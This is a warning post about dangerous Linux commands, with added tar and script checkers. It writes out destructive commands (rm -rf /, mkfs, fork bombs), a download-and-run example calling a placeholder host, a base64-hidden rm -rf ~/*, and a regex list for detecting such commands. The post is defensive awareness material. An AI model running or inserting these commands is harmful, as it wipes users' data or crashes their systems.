
Malicious Linux commands to avoid


Warning: Don't run these commands on your machine. They can erase your valuable data or crash your machine.

It is worthwhile to have basic knowledge about malicious commands in Linux. Don't blindly run commands given on websites or in scripts downloaded from the internet. Verify the contents of a script for any commands that can harm your computer.
If you want to know what a command can do, use the man pages if you are offline. You can get the information of a command by typing
info <command name>
in the terminal.
Example: info sudo
If you are connected to the internet then type
man <command name>
in the terminal to get the updated documentation.
Example: man sudo
Again, the following commands can heavily damage your OS. These are extremely dangerous and should not be attempted on any computer that has any physical connection to valuable data.

1. COMMANDS THAT CAN DELETE FILES AND FOLDERS

rm -rf /
rm -rf .
rm -rf *

rm means remove, -f means "force" deletion (even if write protected), and -r means do it recursively, i.e. including all subfolders.
rm -rf / means delete everything in the root directory and all subfolders.
rm -rf . means delete the current directory and all subfolders.
rm -rf * means delete all files in the current directory and all subfolders.

2. COMMANDS THAT CAN REFORMAT A DRIVE:

mkfs
mkfs.ext3
mkfs.anything

Whatever follows the mkfs command will be destroyed and replaced with a blank filesystem.

3. FORKBOMB:
  • In Bourne-ish shells (like Bash):

:(){:|:&};:

  • In Perl:

fork while fork

These commands execute a huge number of processes until the system freezes, forcing a hard reset of the computer (which may cause data corruption or operating system damage).


4. TARBOMB:
A tar archive can be crafted to explode into a million files, or to inject files into the system by guessing file names. So, be careful with tar files or compressed files downloaded from the internet.
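
A pre-extraction check for the two risks described above, as an added example that is not part of the original post. It reads a "tar -tf" listing and flags absolute paths, ".." components, the lack of a single top-level directory, and an excessive member count; the function names and the MAX_ENTRIES threshold are assumptions.

```shell
#!/bin/sh
# Added example: classify a `tar -tf` listing before extracting anything.
# MAX_ENTRIES is an assumed threshold; tune it for your environment.
MAX_ENTRIES=${MAX_ENTRIES:-10000}

# Reads member names on stdin, prints findings, returns 1 if any were found.
check_tar_listing() {
    awk -v max="$MAX_ENTRIES" '
        { n++; name = $0 }
        # A member stored with a leading "/" targets a fixed system path.
        name ~ /^\// { print "absolute path: " name; bad = 1 }
        # A ".." component lets a member climb out of the extraction dir.
        name ~ /(^|\/)\.\.(\/|$)/ { print "parent-directory reference: " name; bad = 1 }
        {
            # Count distinct first path components (ignoring a leading "./").
            sub(/^\.\//, "", name)
            split(name, parts, "/")
            if (parts[1] != "" && !(parts[1] in top)) { top[parts[1]] = 1; tops++ }
        }
        END {
            if (tops > 1) {
                print "no single top-level directory (" tops " top-level entries)"
                bad = 1
            }
            if (n > max) { print "too many members: " n; bad = 1 }
            exit (bad ? 1 : 0)
        }'
}

# List the archive (nothing is written to disk) and check the listing.
tar_precheck() {
    tar -tf "$1" | check_tar_listing
}
```

Run tar_precheck on the archive first; if it reports anything, extract only inside an empty scratch directory (tar -xf archive -C scratchdir) or not at all.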


5. MALICIOUS CODE IN SHELL SCRIPTS:

wget http://some_address/some_file
sh ./some_file

Be careful while downloading scripts from the internet. They might contain benign or malicious code. Never execute code from people you don't trust.

6. MALICIOUS SOURCE CODE TO BE COMPILED THEN EXECUTED:
Do not compile the source or execute the resulting compiled code unless the source is some well-known application obtained from a reputable site.
It is easy to hide malicious code inside source code.


7. BASE64 COMMANDS:

echo cm0gLXJmIH4vKg== | base64 -d

This is the base64 form of rm -rf ~/*
So, just be careful while executing commands or scripts.
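
One way to check a downloaded script before running it, covering sections 5 and 7 (an added example, not part of the original post). It searches the file for some of the command patterns listed here and also decodes base64-looking tokens to text, without executing them, to see whether they hide the same commands; the function name, the pattern list and the 12-character token threshold are assumptions, and the list is illustrative rather than exhaustive.

```shell
#!/bin/sh
# Added example: flag command patterns from this post in a script file.
# RISKY is an illustrative, non-exhaustive pattern list (assumption).
RISKY='(^|[^a-zA-Z])rm +-[a-zA-Z]*(r[a-zA-Z]*f|f[a-zA-Z]*r)'
RISKY="$RISKY"'|mkfs'
RISKY="$RISKY"'|base64 +(-d|--decode).*[|] *(ba)?sh'
RISKY="$RISKY"'|(wget|curl) .*[|] *(ba)?sh'

# Prints findings for the file given as $1; returns 1 if anything was flagged.
scan_script() {
    file=$1
    found=0
    # 1. Plain-text matches, printed with their line numbers.
    if grep -nE "$RISKY" "$file"; then
        found=1
    fi
    # 2. Base64-looking tokens: decode to printable text only (the result is
    #    never passed to a shell) and run the same patterns over it.
    for tok in $(grep -oE '[A-Za-z0-9+/]{12,}={0,2}' "$file"); do
        decoded=$(printf '%s' "$tok" | base64 -d 2>/dev/null | tr -cd '[:print:]')
        if printf '%s\n' "$decoded" | grep -qE "$RISKY"; then
            printf 'base64 token %s decodes to: %s\n' "$tok" "$decoded"
            found=1
        fi
    done
    return $found
}
```

After downloading a file as in section 5, run scan_script ./some_file and read the script yourself before deciding whether to execute it.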
This post isn't an exhaustive list of malicious commands. There are more malicious commands out there. So, become command-literate before you start using the command line.
